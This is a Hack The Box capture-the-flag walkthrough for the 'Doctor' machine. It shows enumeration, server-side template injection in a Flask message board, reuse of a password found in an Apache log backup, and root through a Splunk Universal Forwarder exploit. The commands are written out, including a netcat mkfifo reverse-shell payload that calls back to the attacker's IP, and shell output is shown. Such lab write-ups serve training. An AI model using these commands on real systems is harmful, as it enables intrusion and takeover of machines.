Doctor is a linux machine rated as easy from Hack The Box, it consists on finding a virtual hosts which contains a messaging service vulnerable to server-side template injection, then after obtaining access a root shell can be obtained abusing splunk forwarder.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sC -sV doctor.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST
Nmap scan report for doctor.htb (10.129.18.114)
Host is up (0.047s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following page : 
Scrolling down a bit we can see an email : info@doctors.htb so I decided to add it to my hosts file as it could be a virtual host.
Browsing to doctors.htb we are greeted with a login form , but there’s an option to register new users:
So we can create an account and access the site :
Once being logged in we can create messages :
Now, we can use gobuster to discover hidden directories :
1
2
3
4
5
6
7
gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/register (Status: 200)
/account (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/home (Status: 302)
/logout (Status: 302)
Browsing to /archive it seems that it is empty but inspecting the source code we can see the title of our message:
1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
Checking wappalyzer we see the site has been built using flask and python 3:
Taking this into account, we can try to see if the site is vulnerable to SSTI (server-side template injection), to do it we will input a mathematical expression and then check if it has been evaluated:
Going to /archive we see we have got the result of the mathematical operation , so the site is vulnerable to ssti :
1
2
3
4
5
6
7
8
9
10
11
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
<item><title>14</title></item>
</channel>
Exploitation
Now we can try to get a python reverse shell using a payload from PayloadAllTheThings
After posting the message we trigger it browsing to /archive, checking netcat we get a reverse shell as web:
1
2
3
4
5
6
7
8
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
$ whoami
web
Now we need to pivot to other user, shaun :
1
2
web@doctor:/home$ ls
shaun web
Inside the apache2 logs folder, there was a file which caught my attention called backup :
1
2
3
4
5
6
7
8
9
web@doctor:/var/log/apache2$ ls
access.log access.log.6.gz error.log.11.gz error.log.6.gz
access.log.1 access.log.7.gz error.log.12.gz error.log.7.gz
access.log.10.gz access.log.8.gz error.log.13.gz error.log.8.gz
access.log.11.gz access.log.9.gz error.log.14.gz error.log.9.gz
access.log.2.gz backup error.log.2.gz other_vhosts_access.log
access.log.3.gz error.log error.log.3.gz
access.log.4.gz error.log.1 error.log.4.gz
access.log.5.gz error.log.10.gz error.log.5.gz
Grepping for a password inside it we get the credentials for pivoting to shaun :
1
2
3
4
5
6
web@doctor:/var/log/apache2$ cat backup | grep password
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
Privilege Escalation
Going back to the nmap scan, we found that port 8089 was open running Splunk.
Inside /opt directory there was another dir called splunkforwarder :
1
2
shaun@doctor:/opt$ ls
clean splunkforwarder
Searching for splunkforwarder privilege escalation I came across the following exploit
This github repo contains two exploits, a local and a remote one, as the exploit was written in python2 and the machine had python3 I decided to go with the remote exploit .
With this exploit we can abuse Splunk Universal Forwarder by configuring it to use our machine as deployment server, then we the connection is done our machine will send a malicious code as deployment applications.
For running the exploit remotely we need to use shaun credentials instead of the default ones, then we can specify the payload to obtain a reverse shell through netcat.
Running the exploit :
1
2
3
4
5
6
7
8
9
10
11
12
python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123
--payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f'
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.161:8181/
10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
Checking netcat we have obtained a root shell :
1
2
3
4
5
6
7
8
9
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
doctor